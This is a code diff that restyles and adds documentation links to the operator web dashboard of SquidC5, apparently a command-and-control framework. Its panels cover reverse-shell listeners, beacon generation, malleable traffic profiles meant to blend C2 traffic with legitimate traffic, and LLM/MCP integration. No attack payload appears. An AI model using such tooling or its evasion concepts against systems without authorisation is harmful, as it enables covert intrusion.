       <div class="outbox empty-out" id="aiOut" style="margin-top:10px;border-color:rgba(192,38,255,0.35);color:#e9d5ff">AI result</div>
-    `, true));
+    `, true, "admin-ai"));
   }
 
   // ----- LLM manage -----
   if (can("llm:manage")) {
     parts.push(panel("llmPanel", "🧠 LLM connections", `
-      ${hint("BYO model endpoints for Admin AI (OpenAI-compatible, including xAI Grok). Keys are stored server-side in data/ and never returned by status APIs. Add a named connection, then Admin AI can use it; without an LLM the AI stays offline-fallback only.")}
+      ${hint("BYO model endpoints for Admin AI (OpenAI-compatible, including xAI Grok). Keys are stored server-side in data/ and never returned by status APIs. Add a named connection, then Admin AI can use it; without an LLM the AI stays offline-fallback only.", "llm-connections")}
       <label for="llmName">Name</label>
       <input id="llmName" placeholder="grok-prod" autocomplete="off" />
       <label for="llmModel">Model</label>
@@ -282,13 +294,13 @@
         <button type="button" id="llmListBtn">List</button>
       </div>
       <div class="outbox empty-out" id="llmOut" style="margin-top:8px">—</div>
-    `, true));
+    `, true, "llm-connections"));
   }
 
   // ----- Tokens -----
   if (can("tokens:manage") || can("admin")) {
     parts.push(panel("tokensPanel", "🔑 Tokens", `
-      ${hint("Mint scoped API tokens for operators, automation, or MCP. The raw <code>sc5_…</code> secret is shown <strong>once</strong> at create — copy it immediately. Presets map to common scope bundles; custom lets you pick exact scopes. Revoke compromised tokens from the list.")}
+      ${hint("Mint scoped API tokens for operators, automation, or MCP. The raw <code>sc5_…</code> secret is shown <strong>once</strong> at create — copy it immediately. Presets map to common scope bundles; custom lets you pick exact scopes. Revoke compromised tokens from the list.", "tokens")}
       <label for="tokName">Name</label>
       <input id="tokName" placeholder="operator-phone" autocomplete="off" />
       <label for="tokPreset">Preset</label>
@@ -311,26 +323,26 @@
       <div class="outbox empty-out" id="tokMintOut" style="margin-top:10px;border-color:rgba(0,255,157,0.35);color:var(--ok)">Minted token appears here once</div>
       <h2 style="margin-top:12px">Active tokens</h2>
       <div id="tokList" class="empty">—</div>
-    `, true));
+    `, true, "tokens"));
   }
 
   // ----- Observability extras -----
   if (can("metrics:read") || can("audit:read") || can("admin")) {
     parts.push(panel("obsExtraPanel", "🗺 Timeline / report", `
-      ${hint("Higher-level ops forensics: anomaly hints, a chronological event timeline, and exportable engagement reports. Complements raw metrics/audit with operator-facing summaries for handoff and after-action.")}
+      ${hint("Higher-level ops forensics: anomaly hints, a chronological event timeline, and exportable engagement reports. Complements raw metrics/audit with operator-facing summaries for handoff and after-action.", "timeline-and-reports")}
       <div class="row">
         <button type="button" id="anomalyBtn">Anomalies</button>
         <button type="button" id="reportBtn">Export report</button>
         <button type="button" id="timelineBtn">Timeline</button>
       </div>
       <div class="outbox empty-out" id="obsExtraOut" style="margin-top:8px">—</div>
-    `, true));
+    `, true, "timeline-and-reports"));
   }
 
   // ----- Collab chat -----
   if (can("collab:use") || can("admin")) {
     parts.push(panel("chatPanel", "💬 Operator chat", `
-      ${hint("Shared notes between operators on this C2 instance (handoff, spectator context). Not a full team chat product — short operational messages stored with the server and visible to collab-scoped tokens.")}
+      ${hint("Shared notes between operators on this C2 instance (handoff, spectator context). Not a full team chat product — short operational messages stored with the server and visible to collab-scoped tokens.", "operator-chat")}
       <label for="chatMsg">Message</label>
       <input id="chatMsg" placeholder="handoff note…" autocomplete="off" />
       <div class="row">
@@ -338,38 +350,38 @@
         <button type="button" id="chatReloadBtn">Reload</button>
       </div>
       <div class="outbox empty-out" id="chatOut" style="margin-top:8px">—</div>
-    `, true));
+    `, true, "operator-chat"));
   }
 
   // ----- C2 Profiles -----
   if (can("profiles:read") || can("admin")) {
     parts.push(panel("profilesPanel", "📡 C2 profiles", `
-      ${hint("<strong>What they are:</strong> malleable traffic profiles that define how HTTP (and related) beacons look on the wire — paths, headers, jitter, decoy behavior — so C2 blends with legitimate traffic. <strong>What they do:</strong> the active profile is the surface generators and the server expect for implant check-ins. Activate a profile, then Generate beacon (active) so payloads match that profile. Switching profiles mid-op changes the expected beacon shape; regenerate implants after a switch.")}
+      ${hint("<strong>What they are:</strong> malleable traffic profiles that define how HTTP (and related) beacons look on the wire — paths, headers, jitter, decoy behavior — so C2 blends with legitimate traffic. <strong>What they do:</strong> the active profile is the surface generators and the server expect for implant check-ins. Activate a profile, then Generate beacon (active) so payloads match that profile. Switching profiles mid-op changes the expected beacon shape; regenerate implants after a switch.", "c2-profiles")}
       <div id="profList" class="empty">—</div>
       <div class="row" style="margin-top:8px">
         <button type="button" id="profReloadBtn">Reload</button>
         ${can("payloads:generate") || can("admin") ? '<button type="button" class="primary" id="profGenBtn">Generate beacon (active)</button>' : ""}
       </div>
       <div class="outbox empty-out" id="profOut" style="margin-top:8px">—</div>
-    `, true));
+    `, true, "c2-profiles"));
   }
 
   // ----- Feature toggles (admin) -----
   if (can("admin") || can("policy:manage")) {
     parts.push(panel("featuresPanel", "🎛 Feature toggles", `
-      ${hint("Runtime kill-switches enforced by the server. Off means the API denies that capability (MCP, AI paths, etc.). Defaults are secure; <code>public_docs</code> stays locked off. Save writes the flag set; Reload refreshes from the server.")}
+      ${hint("Runtime kill-switches enforced by the server. Off means the API denies that capability (MCP, AI paths, etc.). Defaults are secure; <code>public_docs</code> stays locked off. Save writes the flag set; Reload refreshes from the server.", "feature-toggles")}
       <div id="featureToggles"></div>
       <div class="row">
         <button type="button" class="primary" id="saveFeaturesBtn">Save features</button>
         <button type="button" id="reloadFeaturesBtn">Reload</button>
       </div>
-    `, true));
+    `, true, "feature-toggles"));
   }
 
   // ----- Policy -----
   if (can("policy:manage")) {
     parts.push(panel("policyPanel", "📜 Policy", `
-      ${hint("Risk / allow-deny engine rules: thresholds for high-risk actions, HITL gates, and chain limits. Get policy loads current JSON; edit carefully and Save. Bad policy can block operators or weaken guardrails — treat as production config.")}
+      ${hint("Risk / allow-deny engine rules: thresholds for high-risk actions, HITL gates, and chain limits. Get policy loads current JSON; edit carefully and Save. Bad policy can block operators or weaken guardrails — treat as production config.", "policy")}
       <div class="row">
         <button type="button" id="policyGetBtn">Get policy</button>
       </div>
@@ -379,13 +391,13 @@
         <button type="button" class="primary" id="policySetBtn">Save policy</button>
       </div>
       <div class="outbox empty-out" id="policyOut" style="margin-top:8px">—</div>
-    `, true));
+    `, true, "policy"));
   }
 
   // ----- MCP -----
   if (can("mcp:connect")) {
     parts.push(panel("mcpPanel", "🔌 MCP tools", `
-      ${hint("External AI / MCP bridge: tools exposed to models under a per-token allow-list (not open-ended autonomy). List tools shows what this token may call; Call runs one tool with JSON args. MCP is off by default until features/settings enable it.")}
+      ${hint("External AI / MCP bridge: tools exposed to models under a per-token allow-list (not open-ended autonomy). List tools shows what this token may call; Call runs one tool with JSON args. MCP is off by default until features/settings enable it.", "mcp-tools")}
       <div class="row">
         <button type="button" id="mcpToolsBtn">List tools</button>
       </div>
@@ -397,10 +409,10 @@
         <button type="button" class="primary" id="mcpCallBtn">Call</button>
       </div>
       <div class="outbox empty-out" id="mcpOut" style="margin-top:8px">—</div>
-    `, true));
+    `, true, "mcp-tools"));
   }
 
-  root.innerHTML = parts.join("\n") || '<div class="card muted">No scoped actions for this token.</div>';
+  root.innerHTML = parts.join("\n") || '<details class="panel" open><summary>Console</summary><p class="muted">No scoped actions for this token.</p></details>';
 
   function escapeHtml(s) {
     return String(s)

--- a/web/phone-dashboard.html
+++ b/web/phone-dashboard.html
@@ -4,14 +4,23 @@
   <meta charset="utf-8" />
   <meta name="viewport" content="width=device-width, initial-scale=1, viewport-fit=cover" />
   <meta name="apple-mobile-web-app-capable" content="yes" />
-  <meta name="theme-color" content="#000000" />
+  <meta name="theme-color" content="#140814" />
   <link rel="icon" href="https://i.imgur.com/m1FBjqj.png" type="image/png" />
   <link rel="stylesheet" href="https://squidoffense.com/css/typography.css" />
   <title>SquidC5</title>
   <style>
     :root {
-      --pink: #ff00aa; --purple: #c026ff; --ok: #00ff9d; --warn: #fbbf24; --bad: #fb7185;
-      --muted: #a1a1aa; --border: rgba(255,255,255,0.1); --card: rgba(24,24,27,0.92);
+      --pink: #ff2ec4;
+      --pink-hot: #ff5ad5;
+      --purple: #e040ff;
+      --ok: #3dffa8;
+      --warn: #ffd23f;
+      --bad: #ff6b8a;
+      --cyan: #22d3ee;
+      --muted: #b4b4be;
+      --border: rgba(255, 80, 200, 0.22);
+      --card: rgba(22, 10, 28, 0.94);
+      --glow: 0 0 28px rgba(255, 46, 196, 0.35);
       --radius: 14px;
       --font: system-ui, -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Arial, sans-serif;
       --mono: ui-monospace, SFMono-Regular, Menlo, Consolas, monospace;
@@ -19,7 +28,11 @@
     * { box-sizing: border-box; }
     body {
       margin: 0; font-family: var(--font); color: #fff;
-      background: linear-gradient(180deg, #000 0%, #1a0a12 100%);
+      background:
+        radial-gradient(1200px 600px at 10% -10%, rgba(255, 46, 196, 0.22), transparent 55%),
+        radial-gradient(900px 500px at 100% 0%, rgba(224, 64, 255, 0.16), transparent 50%),
+        radial-gradient(800px 400px at 50% 100%, rgba(61, 255, 168, 0.06), transparent 45%),
+        linear-gradient(180deg, #050008 0%, #140814 45%, #0a0610 100%);
       min-height: 100dvh;
       padding: max(12px, env(safe-area-inset-top)) 12px calc(20px + env(safe-area-inset-bottom));
     }
@@ -34,37 +47,55 @@
     /* Full-width work surfaces (used by multi-column layouts) */
     .col-span-all { width: 100%; }
 
-    .brand img { width: 48px; height: 48px; object-fit: contain; filter: drop-shadow(0 0 14px #ff00aa); }
+    .brand img { width: 48px; height: 48px; object-fit: contain; filter: drop-shadow(0 0 18px var(--pink)); }
     .brand h1 { margin: 0; font-size: 1.25rem; letter-spacing: -0.02em; }
-    .brand h1 .p { color: var(--pink); text-shadow: 0 0 10px #ff00aa; }
+    .brand h1 .p { color: var(--pink-hot); text-shadow: 0 0 14px var(--pink), 0 0 28px rgba(255,46,196,0.5); }
     .brand .sub { font-size: 0.68rem; color: var(--muted); letter-spacing: 0.12em; text-transform: uppercase; }
     .badge {
       margin-left: auto; font: 700 0.65rem/1 var(--mono); letter-spacing: 0.06em;
       text-transform: uppercase; padding: 6px 10px; border-radius: 8px;
       border: 1px solid rgba(255,255,255,0.2); color: var(--muted);
     }
-    .badge.ok { color: var(--ok); border-color: rgba(0,255,157,0.35); }
-    .badge.bad { color: var(--bad); border-color: rgba(251,113,133,0.4); }
-    .badge.admin { color: var(--pink); border-color: rgba(255,0,170,0.4); margin-left: 6px; }
+    .badge.ok { color: var(--ok); border-color: rgba(61,255,168,0.55); box-shadow: 0 0 12px rgba(61,255,168,0.25); }
+    .badge.bad { color: var(--bad); border-color: rgba(255,107,138,0.55); box-shadow: 0 0 12px rgba(255,107,138,0.2); }
+    .badge.admin { color: var(--pink-hot); border-color: rgba(255,46,196,0.55); margin-left: 6px; box-shadow: 0 0 12px rgba(255,46,196,0.25); }
     .hero {
-      border: 1px solid rgba(255,0,170,0.35); border-radius: 16px; padding: 12px;
-      margin-bottom: 12px; background: rgba(10,10,12,0.9); position: relative;
+      border: 1px solid rgba(255,46,196,0.55); border-radius: 16px; padding: 12px;
+      margin-bottom: 12px; background: linear-gradient(145deg, rgba(40,8,28,0.95), rgba(12,6,18,0.96));
+      position: relative; box-shadow: var(--glow), inset 0 0 40px rgba(255,46,196,0.06);
     }
     .hero::before {
-      content: ""; position: absolute; top: 0; left: 0; width: 4px; height: 56px;
-      background: var(--pink); box-shadow: 0 0 12px #ff00aa;
+      content: ""; position: absolute; top: 0; left: 0; width: 4px; height: 100%;
+      border-radius: 16px 0 0 16px;
+      background: linear-gradient(180deg, var(--pink-hot), var(--purple), var(--cyan));
+      box-shadow: 0 0 16px var(--pink);
     }
-    .hero-host { font: 0.85rem var(--mono); color: var(--pink); word-break: break-all; margin-bottom: 10px; }
+    .hero-host { font: 0.85rem var(--mono); color: var(--pink-hot); word-break: break-all; margin-bottom: 10px; text-shadow: 0 0 12px rgba(255,46,196,0.45); }
     .stats { display: grid; grid-template-columns: repeat(3, 1fr); gap: 8px; }
     .stat {
-      background: rgba(0,0,0,0.4); border: 1px solid var(--border); border-radius: 12px;
+      background: linear-gradient(160deg, rgba(255,46,196,0.12), rgba(0,0,0,0.45));
+      border: 1px solid rgba(255,46,196,0.28); border-radius: 12px;
       padding: 10px 6px; text-align: center;
+      box-shadow: inset 0 0 20px rgba(255,46,196,0.06);
     }
-    .stat .n { font-size: 1.35rem; font-weight: 800; }
+    .stat .n { font-size: 1.35rem; font-weight: 800; color: #fff; text-shadow: 0 0 12px rgba(255,255,255,0.15); }
     .stat .l { font-size: 0.62rem; color: var(--muted); text-transform: uppercase; letter-spacing: 0.06em; margin-top: 2px; }
+    .stat.tone-ok { border-color: rgba(61,255,168,0.4); background: linear-gradient(160deg, rgba(61,255,168,0.14), rgba(0,0,0,0.45)); }
+    .stat.tone-ok .n { color: var(--ok); text-shadow: 0 0 14px rgba(61,255,168,0.45); }
+    .stat.tone-pink { border-color: rgba(255,46,196,0.5); }
+    .stat.tone-pink .n { color: var(--pink-hot); text-shadow: 0 0 14px rgba(255,46,196,0.5); }
+    .stat.tone-purple { border-color: rgba(224,64,255,0.45); background: linear-gradient(160deg, rgba(224,64,255,0.14), rgba(0,0,0,0.45)); }
+    .stat.tone-purple .n { color: #f0abfc; text-shadow: 0 0 14px rgba(224,64,255,0.45); }
+    .stat.tone-cyan { border-color: rgba(34,211,238,0.4); background: linear-gradient(160deg, rgba(34,211,238,0.12), rgba(0,0,0,0.45)); }
+    .stat.tone-cyan .n { color: var(--cyan); text-shadow: 0 0 14px rgba(34,211,238,0.4); }
+    .stat.tone-warn { border-color: rgba(255,210,63,0.4); background: linear-gradient(160deg, rgba(255,210,63,0.1), rgba(0,0,0,0.45)); }
+    .stat.tone-warn .n { color: var(--warn); text-shadow: 0 0 12px rgba(255,210,63,0.35); }
+    .stat.tone-bad { border-color: rgba(255,107,138,0.4); background: linear-gradient(160deg, rgba(255,107,138,0.12), rgba(0,0,0,0.45)); }
+    .stat.tone-bad .n { color: var(--bad); text-shadow: 0 0 12px rgba(255,107,138,0.35); }
     .card {
       background: var(--card); border: 1px solid var(--border); border-radius: var(--radius);
       padding: 12px; margin-bottom: 10px;
+      box-shadow: 0 0 20px rgba(255,46,196,0.08);
     }
     .card h2 {
       margin: 0 0 8px; font-size: 0.72rem; letter-spacing: 0.12em;
@@ -74,17 +105,29 @@
     .hint {
       color: var(--muted); font-size: 0.78rem; line-height: 1.45;
       margin: 0 0 10px; padding: 8px 10px;
-      background: rgba(0,0,0,0.28); border-left: 3px solid rgba(255,0,170,0.45);
+      background: rgba(255,46,196,0.08); border-left: 3px solid var(--pink);
       border-radius: 0 8px 8px 0;
     }
     .hint code {
-      font-family: var(--mono); font-size: 0.72rem; color: #f0abfc;
+      font-family: var(--mono); font-size: 0.72rem; color: #f9a8ff;
     }
     .hint strong { color: #e4e4e7; font-weight: 700; }
+    a.doc-link {
+      color: var(--pink-hot); font-weight: 700; text-decoration: none;
+      border-bottom: 1px solid rgba(255,46,196,0.45);
+    }
+    a.doc-link:hover { color: #fff; border-bottom-color: var(--pink-hot); text-shadow: 0 0 10px rgba(255,46,196,0.5); }
+    a.doc-link.summary-doc {
+      font: 700 0.65rem/1 var(--mono); letter-spacing: 0.06em; text-transform: uppercase;
+      border: 1px solid rgba(255,46,196,0.4); border-radius: 6px; padding: 4px 8px;
+      border-bottom: 1px solid rgba(255,46,196,0.4); flex-shrink: 0;
+      background: rgba(255,46,196,0.1);
+    }
+    a.doc-link.summary-doc:hover { background: rgba(255,46,196,0.22); }
     .mono { font-family: var(--mono); font-size: 0.75rem; word-break: break-all; }
     table { width: 100%; border-collapse: collapse; font-size: 0.8rem; }
     th, td { text-align: left; padding: 8px 4px; border-bottom: 1px solid rgba(255,0,170,0.1); vertical-align: top; }
-    th { color: #ffb3ff; font-size: 0.65rem; text-transform: uppercase; letter-spacing: 0.05em; }
+    th { color: #ff9aef; font-size: 0.65rem; text-transform: uppercase; letter-spacing: 0.05em; }
     tr:last-child td { border-bottom: 0; }
     .pill {
       display: inline-block; font: 700 0.62rem var(--mono); padding: 2px 6px;
@@ -92,13 +135,149 @@
     }
     .pill.ok { color: var(--ok); border-color: rgba(0,255,157,0.35); }
     .pill.bad { color: var(--bad); border-color: rgba(251,113,133,0.35); }
-    details.panel {
-      background: var(--card); border: 1px solid var(--border); border-radius: var(--radius);
-      padding: 10px 12px; margin-bottom: 10px;
+    :root {
+      --panel-tile-h: 340px;
+      --panel-tile-h-wide: 400px;
+      --panel-head-h: 40px;
     }
-    details.panel summary { cursor: pointer; font-weight: 700; font-size: 0.9rem; list-style: none; }
+    details.panel {
+      background: linear-gradient(165deg, rgba(36,12,32,0.96), rgba(14,8,20,0.96));
+      border: 1px solid rgba(255,46,196,0.28);
+      border-radius: var(--radius);
+      padding: 10px 12px; margin-bottom: 10px;
+      box-sizing: border-box;
+      box-shadow: 0 0 22px rgba(255,46,196,0.1);
+    }
+    details.panel summary {
+      cursor: pointer; font-weight: 700; font-size: 0.9rem; list-style: none;
+      display: flex; align-items: center; gap: 8px; user-select: none;
+      flex-shrink: 0;
+      min-height: var(--panel-head-h);
+      box-sizing: border-box;
+    }
     details.panel summary::-webkit-details-marker { display: none; }
-    details.panel[open] summary { margin-bottom: 10px; color: var(--pink); }
+    details.panel summary::before {
+      content: "▸"; color: var(--pink); font-size: 0.75rem; line-height: 1;
+      transition: transform 0.12s ease;
+    }
+    details.panel[open] summary::before { transform: rotate(90deg); }
+    details.panel[open] summary { margin-bottom: 6px; color: var(--pink); }
+    details.panel .panel-title { flex: 1; min-width: 0; }
+    /* Equal-size open tiles; body scrolls when content overflows.
+       Use grid (not flex) — details+flex overflow is unreliable in Chromium. */
+    details.panel[open] {
+      height: var(--panel-tile-h);
+      max-height: var(--panel-tile-h);
+      display: grid;
+      grid-template-rows: auto minmax(0, 1fr);
+      overflow: hidden;
+    }
+    details.panel[open].is-wide {
+      height: var(--panel-tile-h-wide);
+      max-height: var(--panel-tile-h-wide);
+    }
+    /* Status overview: always height-fit content, never a scroll tile */
+    details.panel.hero[open],
+    details.panel#heroPanel[open] {
+      height: auto !important;
+      max-height: none !important;
+      display: block !important;
+      overflow: visible !important;
+    }
+    details.panel.hero[open] > .panel-body,
+    details.panel#heroPanel[open] > .panel-body {
+      height: auto !important;
+      max-height: none !important;
+      overflow: visible !important;
+    }
+    details.panel:not([open]) {
+      height: auto;
+      max-height: none;
+      display: block;
+      overflow: visible;
+    }
+    details.panel > .panel-body {
+      min-height: 0;
+      max-height: 100%;
+      overflow-x: hidden;
+      overflow-y: auto;
+      /* Do not trap wheel by default — only when focused + actually scrollable (JS). */
+      overscroll-behavior: auto;
+      -webkit-overflow-scrolling: touch;
+      scrollbar-width: thin;
+      scrollbar-color: rgba(255,0,170,0.45) rgba(0,0,0,0.2);
+      padding-right: 4px;
+      padding-bottom: 28px;
+      box-sizing: border-box;
+    }
+    /* Extra bottom room for dense admin panels */
+    #identityCard > .panel-body,
+    #quickRunCard > .panel-body,
+    #sessionsPanel > .panel-body,
+    #tasksPanel > .panel-body,
+    #listenersPanel > .panel-body,
+    #payloadsPanel > .panel-body,
+    #pluginsPanel > .panel-body,
+    #deployPanel > .panel-body,
+    #obsPanel > .panel-body,
+    #aiCard > .panel-body,
+    #llmPanel > .panel-body,
+    #tokensPanel > .panel-body,
+    #obsExtraPanel > .panel-body,
+    #chatPanel > .panel-body,
+    #profilesPanel > .panel-body,
+    #featuresPanel > .panel-body,
+    #policyPanel > .panel-body,
+    #mcpPanel > .panel-body {
+      padding-bottom: 40px;
+    }
+    details.panel > .panel-body.scroll-focus {
+      outline: 1px solid rgba(255,0,170,0.25);
+      outline-offset: -1px;
+      overscroll-behavior: contain;
+    }
+    details.panel:not([open]) > .panel-body {
+      display: none;
+    }
+    details.panel[open] .outbox {
+      max-height: none;
+    }
+    details.panel[open] .event-feed {
+      max-height: none;
+    }
+    details.panel[open] textarea {
+      max-height: 120px;
+    }
+    .wide-btn {
+      appearance: none; flex: 0 0 auto !important; min-width: 0 !important;
+      width: auto; margin-left: auto; padding: 4px 8px !important;
+      font: 700 0.75rem/1 var(--mono) !important;
+      border-radius: 8px; border: 1px solid var(--border);
+      background: rgba(255,255,255,0.06); color: var(--muted);
+      cursor: pointer; box-shadow: none !important;
+    }
+    .wide-btn:hover { color: var(--pink); border-color: rgba(255,0,170,0.4); }
+    details.panel.is-wide .wide-btn {
+      color: var(--pink); border-color: rgba(255,0,170,0.45);
+      background: rgba(255,0,170,0.12);
+    }
+    .drag-handle {
+      cursor: grab; color: var(--muted); font: 700 0.85rem/1 var(--mono);
+      letter-spacing: -0.08em; padding: 4px 6px; margin: -4px 0 -4px -2px;
+      border-radius: 6px; flex-shrink: 0; touch-action: none;
+    }
+    .drag-handle:hover { color: var(--pink); background: rgba(255,0,170,0.12); }
+    .drag-handle:active { cursor: grabbing; }
+    details.panel.is-dragging {
+      opacity: 0.55; outline: 1px dashed rgba(255,0,170,0.55);
+    }
+    details.panel.drag-over {
+      box-shadow: 0 0 0 2px rgba(255,0,170,0.45);
+    }
+    .layout-hint {
+      font-size: 0.68rem; color: var(--muted); margin: 0 0 8px;
+      letter-spacing: 0.04em;
+    }
     label {
       display: block; font-size: 0.68rem; color: var(--muted); text-transform: uppercase;
       letter-spacing: 0.06em; font-weight: 700; margin: 8px 0 4px;
@@ -117,7 +296,11 @@
       background: rgba(255,255,255,0.06); color: #fff; border-radius: 12px;
       padding: 11px 12px; font: 700 0.85rem var(--font); cursor: pointer;
     }
-    button.primary { background: var(--pink); color: #000; border-color: transparent; box-shadow: 0 0 20px rgba(255,0,170,0.4); }
+    button.primary {
+      background: linear-gradient(135deg, var(--pink-hot), var(--purple));
+      color: #120018; border-color: transparent;
+      box-shadow: 0 0 24px rgba(255,46,196,0.55), 0 0 8px rgba(224,64,255,0.35);
+    }
     button.danger { border-color: rgba(251,113,133,0.4); color: #fecdd3; }
     button:disabled { opacity: 0.45; cursor: not-allowed; }
     button:active:not(:disabled) { transform: scale(0.98); }
@@ -134,14 +317,15 @@
     .chips { display: flex; flex-wrap: wrap; gap: 6px; }
     .chip {
       font: 0.68rem var(--mono); padding: 5px 8px; border-radius: 8px;
-      background: rgba(0,0,0,0.35); border: 1px solid rgba(255,0,170,0.18); color: #e4e4e7;
+      background: rgba(255,46,196,0.1); border: 1px solid rgba(255,46,196,0.35); color: #f5e1ff;
     }
-    .chip b { color: var(--pink); }
+    .chip b { color: var(--pink-hot); text-shadow: 0 0 8px rgba(255,46,196,0.4); }
     .outbox {
-      margin-top: 8px; background: #050505; border: 1px solid rgba(0,255,157,0.35);
+      margin-top: 8px; background: #050508; border: 1px solid rgba(61,255,168,0.45);
       border-radius: 10px; padding: 12px; font: 0.85rem/1.45 var(--mono);
       white-space: pre-wrap; word-break: break-word; max-height: 280px; overflow: auto;
-      color: #00ff9d; min-height: 3.2em;
+      color: var(--ok); min-height: 3.2em;
+      box-shadow: inset 0 0 24px rgba(61,255,168,0.06);
     }
     .outbox.empty-out { color: var(--muted); border-color: var(--border); }
     .empty { color: var(--muted); font-size: 0.85rem; padding: 6px 0; }
@@ -161,24 +345,20 @@
     .hidden { display: none !important; }
 
     /* Live event stream (top of ops surface) */
-    .event-stream {
-      background: linear-gradient(180deg, rgba(20,8,16,0.95) 0%, rgba(10,10,12,0.92) 100%);
-      border: 1px solid rgba(255,0,170,0.28);
+    details.panel.event-stream {
+      background: linear-gradient(160deg, rgba(48,10,36,0.96) 0%, rgba(12,8,20,0.96) 100%);
+      border: 1px solid rgba(255,46,196,0.45);
       border-radius: 16px;
-      padding: 12px;
       margin-bottom: 12px;
-      box-shadow: 0 0 24px rgba(255,0,170,0.08);
+      box-shadow: 0 0 32px rgba(255,46,196,0.2), inset 0 0 40px rgba(255,46,196,0.05);
     }
     .event-stream-head {
-      display: flex; align-items: center; gap: 10px; margin-bottom: 10px;
-    }
-    .event-stream-head h2 {
-      margin: 0; font-size: 0.72rem; letter-spacing: 0.12em;
-      text-transform: uppercase; color: #e4e4e7; flex: 1;
+      display: flex; align-items: center; gap: 10px; flex: 1; min-width: 0;
+      font-weight: 700;
     }
     .event-stream-head .live-dot {
-      width: 8px; height: 8px; border-radius: 50%;
-      background: var(--ok); box-shadow: 0 0 10px var(--ok);
+      width: 8px; height: 8px; border-radius: 50%; flex-shrink: 0;
+      background: var(--ok); box-shadow: 0 0 12px var(--ok), 0 0 22px rgba(61,255,168,0.5);
       animation: pulse-live 1.6s ease-in-out infinite;
     }
     @keyframes pulse-live {
@@ -187,7 +367,7 @@
     }
     .event-stream-head .count {
       font: 700 0.65rem var(--mono); color: var(--muted);
-      letter-spacing: 0.04em;
+      letter-spacing: 0.04em; margin-left: auto;
     }
     .event-feed {
       max-height: 220px; overflow: auto;
@@ -227,71 +407,43 @@
     }
     .event-feed .empty { padding: 16px 8px; text-align: center; }
 
-    /* Tablet+ : multi-column (not row grid) so uneven cards top-align */
+    /* Masonry packing (JS positions children into shortest column) */
+    .masonry {
+      position: relative;
+      width: 100%;
+    }
+    .masonry > * {
+      box-sizing: border-box;
+      min-width: 0;
+    }
+    .masonry.is-packed > * {
+      position: absolute;
+      margin: 0 !important;
+    }
+    .masonry-span, details.panel.is-wide {
+      /* full-width row — set by user toggle / JS */
+    }
+
+    /* Tablet+ */
     @media (min-width: 768px) {
       body {
         padding: max(16px, env(safe-area-inset-top)) 24px calc(24px + env(safe-area-inset-bottom));
       }
       .wrap { max-width: 1000px; }
-      .overview {
-        display: block;
-        column-count: 2;
-        column-gap: 16px;
-        margin-bottom: 4px;
-      }
-      .overview > * {
-        break-inside: avoid;
-        -webkit-column-break-inside: avoid;
-        page-break-inside: avoid;
-        margin-bottom: 12px;
-        width: 100%;
-        display: inline-block; /* stabilizes break-inside in WebKit */
-      }
-      #adminMount {
-        display: block;
-        column-count: 2;
-        column-gap: 16px;
-        margin-top: 12px;
-      }
-      #adminMount > * {
-        break-inside: avoid;
-        -webkit-column-break-inside: avoid;
-        page-break-inside: avoid;
-        margin-bottom: 12px !important;
-        width: 100%;
-        display: inline-block;
-        min-width: 0;
-      }
-      /* Primary work surfaces span all columns */
-      #adminMount > #identityCard,
-      #adminMount > #quickRunCard,
-      #adminMount > #aiCard {
-        column-span: all;
-        display: block;
-        width: 100%;
-      }
+      .overview { margin-bottom: 4px; }
+      #adminMount { margin-top: 12px; }
       .event-stream { margin-bottom: 14px; }
       .event-feed { max-height: 280px; }
       .outbox { max-height: 380px; }
       button { min-width: 120px; flex: 0 1 auto; }
-      .stats { gap: 12px; }
+      .stats { gap: 12px; grid-template-columns: repeat(3, 1fr); }
       .stat .n { font-size: 1.5rem; }
       .modal { width: min(100%, 420px); }
     }
 
-    /* Desktop: three independent columns */
+    /* Desktop */
     @media (min-width: 1100px) {
       .wrap { max-width: 1440px; }
-      .overview {
-        column-count: 3;
-        column-gap: 18px;
-      }
-      .overview > * { margin-bottom: 14px; }
-      #adminMount {
-        column-count: 3;
-        column-gap: 18px;
-      }
-      #adminMount > * { margin-bottom: 14px !important; }
       .brand h1 { font-size: 1.45rem; }
       .hero { padding: 16px 18px; margin-bottom: 16px; }
       .card, details.panel { padding: 14px 16px; }
@@ -301,6 +453,7 @@
       .event-item {
         grid-template-columns: minmax(120px, auto) minmax(0, 1fr) auto;
       }
+      .stats { grid-template-columns: repeat(3, 1fr); }
     }
   </style>
 </head>
@@ -322,8 +475,8 @@
     <div id="okmsg" class="okmsg"></div>
 
     <details class="panel" id="settingsPanel">
-      <summary>Connection</summary>
-      <p class="hint">Browser credentials for this console. Server URL is the SquidC5 base (usually this host when opened via <code>/ops</code>). API token is a scoped <code>sc5_…</code> secret stored only in localStorage. Admin panels load only after the server accepts the token. Refresh interval polls sessions/listeners/metrics.</p>
+      <summary>Connection <a class="doc-link summary-doc" href="https://github.com/DotNetRussell/SquidC5/blob/master/docs/user-guide.md#connection" target="_blank" rel="noopener noreferrer" onclick="event.stopPropagation()">Docs</a></summary>
+      <p class="hint">Browser credentials for this console. Server URL is the SquidC5 base (usually this host when opened via <code>/ops</code>). API token is a scoped <code>sc5_…</code> secret stored only in localStorage. Admin panels load only after the server accepts the token. Refresh interval polls sessions/listeners/metrics. <a class="doc-link" href="https://github.com/DotNetRussell/SquidC5/blob/master/docs/user-guide.md#connection" target="_blank" rel="noopener noreferrer">Full docs →</a></p>
       <label for="url">Server URL</label>
       <input id="url" type="url" placeholder="http://HOST:8443" autocomplete="off" />
       <label for="token">API token</label>
@@ -341,56 +494,71 @@
       <button type="button" class="primary" id="shareBtn">Phone QR</button>
     </div>
 
-    <div class="hero">
-      <div class="hero-host" id="hostLine">not connected</div>
-      <p class="hint" style="margin-top:0">At-a-glance C2 health for the connected server: verified reverse shells ready for commands, listeners currently running, and process uptime.</p>
-      <div class="stats">
-        <div class="stat"><div class="n" id="nVerified">—</div><div class="l">Verified shells</div></div>
-        <div class="stat"><div class="n" id="nListeners">—</div><div class="l">Listeners up</div></div>
-        <div class="stat"><div class="n" id="nUptime">—</div><div class="l">Uptime</div></div>
-      </div>
-    </div>
-
-    <section class="event-stream" id="eventStream" aria-label="Live event stream">
-      <div class="event-stream-head">
-        <span class="live-dot" title="Live"></span>
-        <h2>Event stream</h2>
-        <span class="count" id="eventCount">0 events</span>
-      </div>
-      <p class="hint" style="margin-top:0">Live activity from this C2: shell connect / verify / reject, listener changes, tasks, and other server events. Newest first; refreshes with the poll interval.</p>
+    <details class="panel event-stream" id="eventStream" aria-label="Live event stream">
+      <summary>
+        <span class="event-stream-head">
+          <span class="live-dot" title="Live"></span>
+          <span>Event stream</span>
+          <span class="count" id="eventCount">0 events</span>
+        </span>
